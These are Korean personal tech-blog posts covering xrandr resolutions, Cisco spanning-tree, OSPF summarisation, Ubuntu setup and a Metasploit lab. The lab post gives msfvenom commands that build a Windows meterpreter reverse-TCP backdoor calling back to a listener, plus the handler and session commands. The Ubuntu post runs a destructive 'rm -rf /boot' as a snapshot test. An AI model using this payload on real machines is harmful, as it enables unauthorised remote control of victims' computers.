전체 글: 185개의 글

[주분투] 리눅스에서 해상도 추가하기 (XRANDR)

Posted by nkjok
2017. 12. 2. 14:03 OS&기타/Linux
반응형

CVT를 이용해서 원하는 해상도를 입력한다.


root@zkjok-virtual-machine:/# cvt 1280 720

# 1280x720 59.86 Hz (CVT 0.92M9) hsync: 44.77 kHz; pclk: 74.50 MHz

Modeline "1280x720_60.00"   74.50  1280 1344 1472 1664  720 723 728 748 -hsync +vsync





NEW 해주고 ADD 해준다.


xrandr --newmode "1280x720_60.00"   74.50  1280 1344 1472 1664  720 723 728 748 -hsync +vsync

xrandr --addmode Virtual1 "1280x720_60.00"







설정은 끝났지만 재부팅을 하면 설정한 해상도가 사라져 있다.  

설정을 유지시키기 위해서는 .profile 파일에 NEW, ADD 명령어를 추가 해줘야 한다. 







xrandr --newmode "1280x720_60.00"   74.50  1280 1344 1472 1664  720 723 728 748 -hsync +vsync

xrandr --addmode Virtual1 "1280x720_60.00"

반응형

Spanning Tree 902.1d (PVST)

Posted by nkjok
2017. 12. 1. 09:46 네트워크-Router, Switch, Security/스위치-Switch
반응형



 Priority 을 이용해 Root Bridge, Root Port, Altn Port, Desg Port 를 수정 가능하다.




셋팅

HQ_SE_3F_SW1(config)#spanning-tree vlan 10 priority 4096

HQ_SE_3F_SW1(config)#spanning-tree vlan 20 priority 8192 

HQ_SE_3F_SW2(config)#spanning-tree vlan 20 priority 4096

HQ_SE_3F_SW2(config)#spanning-tree vlan 10 priority 8192




HQ_SE_3F_SW3#show spanning-tree vlan 10

VLAN0010

Spanning tree enabled protocol ieee

Root ID Priority 4106

Address 0090.0C5E.97D3

Cost 38

Port 1(FastEthernet0/1)

Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec

Bridge ID Priority 32778 (priority 32768 sys-id-ext 10)

Address 000B.BEB0.C1DB

Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec

Aging Time 20

Interface Role Sts Cost Prio.Nbr Type

---------------- ---- --- --------- -------- --------------------------------

Fa0/1 Root FWD 19 128.1 P2p

Fa0/2 Altn BLK 19 128.2 P2p



HQ_SE_3F_SW4#show spanning-tree vlan 20

VLAN0020

Spanning tree enabled protocol ieee

Root ID Priority 4116

Address 0010.11DA.A531

Cost 38

Port 1(FastEthernet0/1)

Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec

Bridge ID Priority 32788 (priority 32768 sys-id-ext 20)

Address 0030.F2D6.6C80

Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec

Aging Time 20

Interface Role Sts Cost Prio.Nbr Type

---------------- ---- --- --------- -------- --------------------------------

Fa0/1 Root FWD 19 128.1 P2p

Fa0/2 Altn BLK 19 128.2 P2p





반응형

'네트워크-Router, Switch, Security > 스위치-Switch' 카테고리의 다른 글

Backbone Fast  (0) 2017.12.10
Uplink Fast  (0) 2017.12.09
Layer2 Etherchannel  (0) 2017.12.07
Layer3 Etherchannel  (0) 2017.12.05
Port Fast  (0) 2017.12.03

Reverse TCP를 이용한 백도어[backdoor] 실습

Posted by nkjok
2017. 11. 30. 18:21 자격증관련/Metasploit
반응형


요약 인증되지 않은 사용자에 의해 컴퓨터의 기능이 무단으로 사용될 수 있도록 컴퓨터에 몰래 설치된 통신 연결 기능을 말한다.

정상적인 인증 절차를 거치지 않고, 컴퓨터와 암호 시스템 등에 접근할 수 있도록 하는 방법이다. 백도어는 주로 설계 및 개발 단계에 의도적으로 심어지는 것이지만, 작동 중인 컴퓨터에 존재하는 보안 취약점을 통해 전송된 소프트웨어(트로이목마Trojan Horse 등)에 의해 만들어지기도 한다. 넓은 의미로는 기능상의 결함으로 인해 원래 허가되지 않은 통신 및 조작을 입력 받는 보안 구멍(hole)도 포함된다. 프로그램에 부분적으로 숨겨진 형태 혹은 독립적인 소프트웨어 형태, 하드웨어 특징 형태로 숨겨져 있을 수도 있다.

설계 및 개발 단계에 포함되는 백도어의 경우, 네트워크 장비 라우터와 방화벽에 개발 단계에서 테스트를 위해 포함되었던 백도어 형태의 기능이 제품 출시 단계에서 제거되지 않고 출하되어, 이를 발견한 사용자가 악용하는 경우가 있다. 또한 컴퓨터 프로그램 개발자에 의해 프로그램에 백도어가 의도적으로 내장되는 경우가 있으며, 미국에서는 대부분의 통신 기기에 미리 정부 기관으로부터의 접근을 허용하는 백도어가 설치되어 있다. 이를 이용한 도청은 법적 절차를 필요로 하지만, 운영 방법은 불투명하다. 의도하지 않은 개발 단계의 백도어는 주로 운영체제 등의 프로그램이 설계 및 개발 상의 실수로 보안 구멍을 가지는 경우가 있다.

이러한 백도어를 예방하기 위해서는 운영체제 및 소프트웨어 업데이트를 통해 보안 취약점을 제거하는 것이 효과적이다. 안티바이러스 소프트웨어는 트로이 목마와 같은 대부분의 백도어 프로그램을 발견하고 제거 및 비활성화 하는 기능을 가지고 있으며, 스파이웨어 제거 소프트웨어 또한 개인정보를 유출시키는 스파이웨어류의 백도어를 제거하는 데 도움이 된다.

[네이버 지식백과] 백도어 [backdoor] (두산백과)




실습 준비물 : 윈도우7 , 리눅스(데비안계열) , metasploit

 본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.


리눅스에서 metasploit 파일을 구해서 설치한다. 

설치 명령어 : dpkg -i metasploit*






msfvenom -p windows/meterpreter/reverse_tcp lhost=자신IP lport=쓸포트 -f(파일네임 약자) exe > /backup/windows.exe(저장경로)

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.12 lport=4444 -f exe > /backup/windows.exe

백도어 파일을 생성해준다음에 msf콘솔을 실행해준다

-l  을 이용해 페이로드 종류를 확인 해볼 수 있다




msfconsole 명령어를 통해 콘솔을 실행한다 






핸들러 정의를 해주고 세션을 확인해보면 현재는 연결된 세션이 없는 것을 확인할 수 있다







이제 테스트 할 윈도우에서 조금 전에 만들어준 백도어 파일을 실행하면 ~







세션이 연결 된 것을 확인 할 수 있다. mkdir Test 라고 입력하면 ~~~







폴더가 생성 된 것을 확인 할 수 있다.







백도어 (Backdoor)


msfvenom설치

metasploit-framework_4.16.16+20171109102928.git.1.c5fd027_1rapid7-1_i386(32bit) 

파일구해서 dpkg -i 로 설치하면됨 (https://apt.metasploit.com/)


msfvenom -l  페일로드 종류확인


msfvenom -p windows/meterpreter/reverse_tcp lhost=자신IP lport=쓸포트 -f(파일네임 약자) exe > /backup/windows.exe(저장경로)

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.12 lport=4444 -f exe > /backup/windows.exe




msfconsole  콘솔실행

use exploit/multi/handler  핸들러테이블 불러오는

set payload windows/meterpreter/reverse_tcp  만든 페이로드와 똑같게

set lhost 192.168.0.12     자신의 IP

set lport 4444             사용할 포트

set exitonsession false    세션을 백그라운드 동작 (해커의)

exploit -j                 핸들러 실행

sessions                   세션 View (연결된 세션 보기)

sessions -i 1              세션과 연결시키기 (세션에서 번호확인하고)

이제 help 쳐보면 할수 있는 커맨드들이 나옴 

예) shutdown (윈도우가 꺼진다)








반응형

OSPF Summary

Posted by nkjok
2017. 11. 30. 11:51 네트워크-Router, Switch, Security/라우터-Router
반응형




네트워크 정보를 요약하여 Routing 테이블에서 다루어야할 정보량을 줄이기



셋팅

HQ_SE_Core_R1#area 1 range 192.168.1.0 255.255.255.128

HQ_SE_Core_R2#area 2 range 192.168.5.0 255.255.255.128




설정 전

HQ_SE_2F_L3_1

192.168.1.0/27 is subnetted, 4 subnets

O IA 192.168.1.0 [110/3] via 192.168.32.1, 00:11:34, FastEthernet0/6

O IA 192.168.1.32 [110/3] via 192.168.32.1, 00:11:34, FastEthernet0/6

O IA 192.168.1.64 [110/2] via 192.168.32.1, 00:11:34, FastEthernet0/6

O IA 192.168.1.96 [110/2] via 192.168.32.1, 00:11:34, FastEthernet0/6

192.168.2.0/27 is subnetted, 1 subnets

C 192.168.2.0 is directly connected, Vlan10

C 192.168.3.0/24 is directly connected, Vlan20

O IA 192.168.4.0/24 [110/2] via 192.168.33.2, 00:11:34, Port-channel10

192.168.5.0/27 is subnetted, 4 subnets

O IA 192.168.5.0 [110/4] via 192.168.32.1, 00:11:34, FastEthernet0/6

                      [110/4] via 192.168.33.2, 00:11:34, Port-channel10

O IA 192.168.5.32 [110/4] via 192.168.32.1, 00:11:34, FastEthernet0/6

                       [110/4] via 192.168.33.2, 00:11:34, Port-channel10

O IA 192.168.5.64 [110/3] via 192.168.32.1, 00:11:34, FastEthernet0/6

                       [110/3] via 192.168.33.2, 00:11:34, Port-channel10

O IA 192.168.5.96 [110/3] via 192.168.32.1, 00:11:34, FastEthernet0/6

                       [110/3] via 192.168.33.2, 00:11:34, Port-channel10

C 192.168.32.0/24 is directly connected, FastEthernet0/6

C 192.168.33.0/24 is directly connected, Port-channel10

O 192.168.34.0/24 [110/2] via 192.168.32.1, 00:11:34, FastEthernet0/6

O 192.168.35.0/24 [110/2] via 192.168.33.2, 00:11:34, Port-channel10




설정후

HQ_SE_2F_L3_1

192.168.1.0/27 is subnetted, 1 subnets

O IA 192.168.1.0 [110/3] via 192.168.32.1, 00:05:18, FastEthernet0/6

192.168.2.0/27 is subnetted, 1 subnets

C 192.168.2.0 is directly connected, Vlan10

C 192.168.3.0/24 is directly connected, Vlan20

O 192.168.4.0/24 [110/2] via 192.168.2.29, 00:05:38, Vlan10

192.168.5.0/25 is subnetted, 1 subnets

O IA 192.168.5.0 [110/3] via 192.168.32.1, 00:05:28, FastEthernet0/6

                      [110/3] via 192.168.33.2, 00:05:28, Port-channel10

C 192.168.32.0/24 is directly connected, FastEthernet0/6

C 192.168.33.0/24 is directly connected, Port-channel10

O 192.168.34.0/24 [110/2] via 192.168.32.1, 00:06:03, FastEthernet0/6

O 192.168.35.0/24 [110/2] via 192.168.33.2, 00:06:03, Port-channel10

반응형

'네트워크-Router, Switch, Security > 라우터-Router' 카테고리의 다른 글

Hot Standby Routing Protocol  (0) 2017.12.13
NAT Static  (0) 2017.12.08
Multi Cast. dense-mode  (0) 2017.12.06
OSPF Key Chain  (0) 2017.12.04
Totally Stub  (0) 2017.12.02

스냅샷 설정, 방화벽 켜기, vi에디터 설치, 화면보호기 끄기, 한영 전환, 컴퓨터 종료하는 명령어 20170405수 [이것이 우분투 리눅스다 구독 3일차]

Posted by nkjok
2017. 4. 9. 16:55 OS&기타/Linux
반응형

화면 보호기 끄기 설정

키보드 설정

한글이 두개 있는데 한개는 지워준다
한글이 두개 있으면 한글 한글 영문 이런식으로 바껴서 불편함 

한영전환은 슈퍼스페이스(윈도우키+스페이스바)

apt-get -y install vim 입력

vi에디터라고 교재 실습 중 많이 사용하는 에디터가 있는데 문제가 좀 있어서 다시 설치해줘야된다

ufw enable 입력

방화벽 켜놓는다

halt -p 입력

컴퓨터 종료하는 명령

이제 스냅샷을 만들어 놓을건데 그전에 
cd/dvd를 비활성화 시켜놓는다

커넥트 파워온 체크해제하고 유즈iso이미지파일을 유즈피즈컬드라이브로 체크해준다

이제 사용 중 인 워크플레이어를 꺼주고 워크프로를 이용해서 작업중인 server 파일을 불러 와준다

vm - snapshot - snapshot manager 클릭

take snapshot 클릭

이름 설정하고 테이크 스냅샷 클릭

스냅샷 테스트
rm -rf /boot 입력 (아주 위험한 명령어 부팅관련된 파일을 삭제한거다)
reboot 입력 해서 리부팅

부팅이 안된다 큰일났쥬

워크프로켜서 스냅샷 지점으로 go to 한다

부팅이 된다~ 타임머신


반응형